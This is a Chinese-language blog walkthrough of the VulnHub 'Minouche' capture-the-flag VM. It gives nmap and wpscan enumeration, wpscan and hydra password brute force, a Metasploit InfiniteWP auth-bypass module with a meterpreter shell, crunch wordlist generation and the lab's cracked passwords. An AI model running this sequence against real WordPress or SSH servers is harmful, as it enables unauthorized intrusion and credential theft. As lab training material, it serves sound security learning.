vulnhub之minouche通关

最新推荐文章于 2024-04-28 16:22:03 发布
最新推荐文章于 2024-04-28 16:22:03 发布
阅读量315 收藏
点赞数
分类专栏: 笔记 文章标签: 安全 渗透测试 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46145025/article/details/118325751
版权

一、信息搜集

1.打开靶机,会看到一个ip地址
在这里插入图片描述
2.再打开kali,使用nmap探测端口信息
#nmap -A -sV 192.168.56.101
在这里插入图片描述
发现三个端口22,80,是开启,9090是关闭
探测出来是WordPress的CMS

二、漏洞利用

由于扫描发现知道是wordpress,所以用wpscan扫描
#wpscan --url http://192.168.56.101 -e u,p 是一个枚举用户名的插件
然后由扫描发现一个kitty的用户
在这里插入图片描述
接着用wpscan爆破密码
#wpscan --url http://192.168.56.101 -U kitty -P /usr/share/wordlists/rockyou.txt
没有什么结果。
在这里插入图片描述
使用插件尝试
wpscan --url http://192.168.56.101 -e u,p --plugins-detection mixed
扫描出一个插件iwp-client,通过查询,他是个有认证绕过的漏洞
在这里插入图片描述
打开msf
msfconsole
search InfiniteWP
use 0
show options
set rhosts 192.168.56.101
set username kitty
set lhost 192.168.8.130
run
meterpreter > shell
id
在这里插入图片描述
获取到一个id,权限是apache,然后开始提权

三、获取信息

通过查看发现两个用户
cat /etc/passwd|grep /bin/bash
查看根目录,发现一个kitty.txt文件
最下边有一段话,翻译得知,密码是$和猫的名字和出生年份组成

在这里插入图片描述
此时,访问192.168.56.101查看,是一个猫的图案,还对其做一简介,他叫Minouche
在这里插入图片描述
出生年份猜想一般是1000和2000开始
现在生成字典 M i n o u c h e 1000 与 Minouche1000与 Minouche1000Minouche2000
使用crunch生成字典
#crunch 13 13 -t "$"Minouche20%% -o /root/test/123

在这里插入图片描述
利用九头蛇爆破,得到正确密码
hydra -l kitty -P 123 ssh://192.168.56.10
在这里插入图片描述
登陆得到的账号和密码,发现该账号家目录下有一个flag文件
在这里插入图片描述
pwd
ls -al
发现有一个压缩文件
下载到本地查看
scp kitty@192.168.56.101 :~/android.zip /root/test 下载到本地test
输入密码$Minouche2005

在这里插入图片描述
cd /test /
ls -al
unzip android.zip解压
ls -al
cd date
ls -al
cd backup/
ls -al
find . -name *.db

在主机打开sqlite
找到/user_de/0/com.android.providers.contacts/databases/contacts2.db

在这里插入图片描述
看到一串字母
YouWillNeverGue$$This

在远程主机
cat /etc/passwd |grep /bin/bash
su root
用长串密码,登录成功
ls -al
cat root.txt

在这里插入图片描述

莫黎小天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机---Minouche
Luciano12的博客
10-09 328
一、信息搜集 1.打开靶机就会回显IP地址 2.使用nmap 探测端口信息 发现22,80端口,9090是闭的,22端口版本较高,所以从80端口入手,探测出来是WordPress的CMS 二、漏洞利用 知道是wordpress就直接用wpscan扫描 wpscan --url http://192.168.1.41 -e u,p 枚举用户名,插件 [+] kitty | Found By: Rss Generator (Passive Detection) | Confirmed By: | Au
Vulnhub——AI: WEB: 1
最新发布
流水不争先,争的是滔滔不绝
06-18 607
(1)OS-shell,Openssl的利用(2)Linux /etc/passwd文件写入root用户进行提权
巴菲特卸任后盖茨梅琳达与四位新理事共管盖茨基金会;Club Med中国第三家冰雪度假村开业 | 美通社头条...
美通社
01-28 518
要闻摘要:盖茨基金会委任四位新理事。Club Med中国第三家冰雪度假村开业。Priority Pass在2021全年新增183个贵宾室和旅行体验项目。默克2025前实现电子科技业务新增在...
1. 哥伦比亚大学校园动荡持续校长宣布停止线下授课2. 英政府为留学生发一万英镑奖学金im- 词缀的起源和含义起源常见用法一个标准的机器学习工作流程,包括数据预处理、模型训练、
m0_62574889的博客
04-28 700
1.哥伦比亚大学校园动荡持续校长宣布停止线下授课 2.英政府为留学生发一万英镑奖学金 im- 词缀的起源和含义 起源 常见用法 一个标准的机器学习工作流程,包括数据预处理、模型训练、参数调优,以及最终的模型评估。 KOL KOL的主要特征: KOL在营销中的作用: 如何有效利用KOL: 域名解析 域名系统(DNS) 解析过程 DNS记录类型 解析顺序
英国央行副行长:期待区块链重整英…
04-18 314
英国央行(BoE)将制定基于英镑结算基础设施现代化发展蓝图,以满足分布式账本技术(DLT,Distributed ledger technology)和其他技术创新的需要。 Minouche Shafik,其为主管金融市场与银行业的英国央行副行长。Shafik在最近有支付行业的演讲中表示,近年来支付方式已经发生了巨大的变化。 Shafik 指出这些变化主要由新进入的支付供给商数量激增与对支付
英国央行将探索去中心化总账技术
04-18 300
英国银行表示,它会对将去中心化总账技术作为该国部分结算系统现代化计划的影响进行考虑。 昨日央行副行长Minouche Shafik在英国央行举办的演讲中,提出了四点倡议,表示将于有今年年底完成目标任务,并于2017年开始开发此技术。 Shafik说,此蓝图将寻求回答以下四个问题。包括确定银行政策目标,确定支付系统应该具备的功能,建立能够访问的系统以及为英国央行选择在服务交付中应该发挥的作用。
tomcat 7 任意文件上传漏洞(信息搜集与漏洞探测)
热门推荐
莫黎小天
09-29 1万+
信息搜集与漏洞探测 (1)查询攻击机kali的IP地址 (2)识别存活主机,发现攻击目标 1)使用nmap -sP扫描c段网络存活主机 发现存在192.168.232.131 2)使用nmap -sS扫描端口开放 发现开放80端口 (3)在浏览器中打开该ip 通过对页面浏览,得知该网站存在一个信息泄露 直接显示出了使用的web服务器tomcat (4)在kali中进行服务扫描验证 使用nmap -sV扫描服务版本 发现该目标使用了Apache Tomcat/Coyote JSP engine 1
linux下awvs安装
莫黎小天
09-11 4781
一、linux下安装AWVS 附awvs安装包链接:https://pan.baidu.com/s/10pjxh_4T0nhC3PWsJfppgQ 提取码:csdn 一、将下好的awvs压缩文件复制到kali的目录下并右键解压 二、给awvs赋予权限 chmod 777 acunetix_trial.sh 三、进入到文件所在的目录,输入./ acunetix_trial.sh 直接运行安装 四、开启AWVS 开启服务:service acunetix_trial start 查看服务状态:servic
谷歌/FOFA搜索引擎使用
莫黎小天
01-21 3896
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的键字用引号括起来(表示完全匹配,即键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url键词的网页,如:inurl:login 搜索
Trunk、本征vlan、vlan跳跃攻击
莫黎小天
04-04 2802
一、Trunk 1.技术背景,解决了什么问题 划分多个vlan之后,解决不同交换机之间,相同vlan的通信问题 相同vlan在不同交换机上,跨越地理位置的通信问题 使用交换机的某一条线路,来承载多个vlan,实现数据通信 当一条链路,需要承载多VLAN信息的时候,需使用trunk来实现 Trunk两端的交换机需采用相同的干道协议 一般见于交换机之间或交换机与路由器、服务器之间 2.实现原理 设置一条IEEE,来实现trunk。 IEEE802.1Q干道协议
windows基础介绍
莫黎小天
11-30 2391
1.基本概念 1.网站核心组成: 操作系统 (核心) 数据库 web中间件 web应用程序 2.服务器 是提供计算机服务的设备 具备承担服务并且保障服务的能力 根据服务对象不同,定制的服务不同 3.dos命令 方法一:win+R 调出 运行 ,执行cmd 方法二:在资源管理器中,文件目录下输入 cmd.exe ipconfig 配置并查看网络配置的基本命令 /all显示网络配置的详细信息 /release 释放动态地址(dhcp分配的) /renew本地计算机请求dhcp
Burp suite暴力破解 皮卡丘 密码
莫黎小天
05-16 2334
1.打开Burp suite软件,找到proxy中的option,看到一个代理ip: 127.0.0.1端口号8080 2.打开火狐,找到扩展组件foxyproxy,配置之前的代理ip 3.打开phpstudy,运行pikachu靶场,找到基于表单的暴力破解,开始尝试登陆 4.此时,切换至Burp suite,看到proxy下的http history中的第一条就是之前尝试的登陆 接着,选中,右键单击send to repeater,点击菜单中的repeater,再点击send得到右边的reso
渗透学习笔记
莫黎小天
11-06 2326
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
跨网段和同网段的通信
莫黎小天
04-12 1899
跨网段和同网段的通信问题: PC配置了网: PC1和PC2要通信的时候(跨) PC1和PC3要通信的时候(同) PC1(源主机)将自己的网段和目标网段进行 与 运算 要看与运算的结果是否和自己的网段相同,如果相同,则为同网段通信,不通过则为跨网段通信。 相同的时候,源主机直接封装目标主机的MAC地址 如果不同,源主机封装网的MAC地址。 ip汇总 192.168.1.28 26与192.168.1.192 26汇总 1 2 4 8 16 32 192.168.1.2
nginx基础介绍
莫黎小天
11-26 1828
1.基本概念 1.介绍 由俄罗斯人研发,应对rambier,并且2004发布第一个版本。 2.特点 稳定性极强。7*24不间断断运行 nginx提供了非常丰富的配置实例 占用内存小,并发能力强 2.安装 nginx的核心配置文件nginx.conf docker ps进入容器 docker exec -it ebd(标识名) bash cd /etc/nginx clear 3.反向代理 1.正向代理和反向代理 正向代理: 1.正向代理是由客户端设立的 2.客户端了解代理服务器和目
pikachu之SQL注入
莫黎小天
06-04 1522
一、数字型注入(post传参–需要抓包): 操作如图,用代理在burp suit抓包,并转入repeater 发现存在id,在id那里输入做测试: 简单判断方法: 1' 、 " 、) 、 ')、 ") 是否报错 1' and 1=1 ' and 1=2 判断返回是否有差异 1' or 1=1 ' or 1=2 判断返回是否有差异 注意:还可以进行的操作有: 1.判断语句中的列数,union查询中不能超过全面的列数。 1' order by 3
kali安装python2与python3
莫黎小天
09-08 1507
1.打开卡里,查看发现存在python2 2.在https://www.python.org/downloads/source/选择下载合适的python3版本 3.建立一个python3文件夹,并解压之前下载的python到python3 mkdir /usr/local/python3 tar -zxvf python-3.7.12 4.编译及安装(注意在其压缩后的文件夹中执行)依次执行 ./configure --prefix=/usr/local/python3 ./configure --e
常见的漏洞以及渗透工具使用
莫黎小天
09-14 1195
一、渗透工具 一、sqlmap 1.判断是否存在注入 假设目标注入点是http://192.168.1.104/sql1/Less-1/?id=11 判断命令 sqlmap.py-u http://192.168.1.104/sql1/Less-1/?id=1 还有一种情况,当注入点后面的参数大于等于两个时,需要加双引号,如下所示。 sqlmap.py-u"http://192.168.1.104/sql1/Less-1/?id=1&uid=2" 2.判断文本中的请求是否存在注入 从文件中加载HTT
DHCP 高可用性技术
莫黎小天
04-15 1008
一、技术背景 传统的手工配置网络参数需要每个用户都手动配置IP地址、掩码、网、DNS等多个参数。 会存在一些问题: 人员素质要求高 容易出错 灵活性差 IP地址资源利用率低 工作量大 为了实现网络可以动态合理地分配IP地址给主机使用,需要用到动态主机配置协议DHCP。 二、概念 动态主机配置协议 (DHCP: dynamic host configuration protocol) c/s架构的 client Server----() 基于UDP的应用层协议 协议号 67(服务端) 6
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值